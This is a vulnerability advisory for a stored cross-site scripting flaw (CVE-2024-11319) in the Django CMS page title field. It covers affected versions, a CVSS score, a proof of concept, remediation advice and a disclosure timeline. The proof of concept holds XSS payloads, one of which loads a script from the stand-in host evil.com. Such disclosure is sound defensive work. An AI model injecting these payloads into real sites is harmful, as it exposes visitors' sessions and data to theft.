Security Update: Issue Fixed
The fix for this vulnerability has been committed here:
https://github.com/django-cms/
Vendor Advisory:
https://www.django-cms.org/en/blog/2024/11/13/django-cms-security-update/
Django CMS version 4.1.3 is affected by a stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject arbitrary JavaScript code that is executed in the context of the web application, potentially compromising the safety of all users visiting the affected page.
CVE-ID: CVE-2024-11319
CVSS Score:
CVSS v4.0 Base Score: 9.3 - Critical
- CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Affected Versions:
- Django CMS version 3.11.7, 3.11.8, 4.1.2, and 4.1.3.
Vulnerability Summary:
A stored XSS vulnerability was identified in Django CMS 4.1.3. It occurs in the Page Title field of the Page Creation interface under the /admin/cms/pagecontent/ endpoint. This vulnerability allows an attacker to inject JavaScript into the title, which will later be rendered in the page context, causing the injected code to execute when a user visits the affected page.
Technical Details:
- Location of the Vulnerability: /admin/cms/pagecontent/ endpoint.
- Vulnerable Field: Page Title field.
- Template Code Reference:
<meta property="og:title" content="{% page_attribute "page_title" %}"/>
- Source File Reference: Found in djangocms_frontend.html.
- Payload Example 1 (Simple):
"><img src=x onerror=alert('iltosec') any - Payload Example 2 (External Script Inclusion):
"><script src="http://evil.com/xss.js"> iltosec
When an admin user creates or edits a page, if malicious content is entered in the Page Title field, it is stored in the database and then rendered on the public-facing page without proper sanitization or output encoding. This allows the attacker to execute arbitrary JavaScript code in the context of any user visiting the page.
Proof of Concept:
- Log in as an admin-level user.
- Navigate to /admin/cms/pagecontent/ to create a new page.
- In the Page Title field, input the following payload:
"><img src=x onerror=alert('iltosec') any
- Save the page.
- When visiting the public page, the JavaScript code executes, displaying an alert with the message 'iltosec'.
Alternatively, an attacker could use a payload like:
"><script src="http://evil.com/xss.js"> iltosec
This would load and execute a malicious script hosted on an external server, compromising the visitor's session or exfiltrating data.
Remediation:
- Input Sanitization: Ensure that all user input is sanitized before being stored in the database. Special characters like <, >, ", and ' should be neutralized.
- Output Encoding: Apply proper output encoding for user-supplied content when rendering it on the page. This will prevent injected JavaScript from being executed.
- CSP (Content Security Policy): Implement a robust CSP to mitigate the risk of external script inclusion and restrict script execution to trusted sources.
Timeline:
|
Date |
Status |
|
09-NOV-2024 |
Reported to vendor |
|
12-NOV-2024 |
Vendor acknowledgement |
|
12-NOV-2024 |
Vulnerability fixed |
|
13-NOV-2024 |
Patch available |
|
18-NOV-2024 |
Public disclosure |
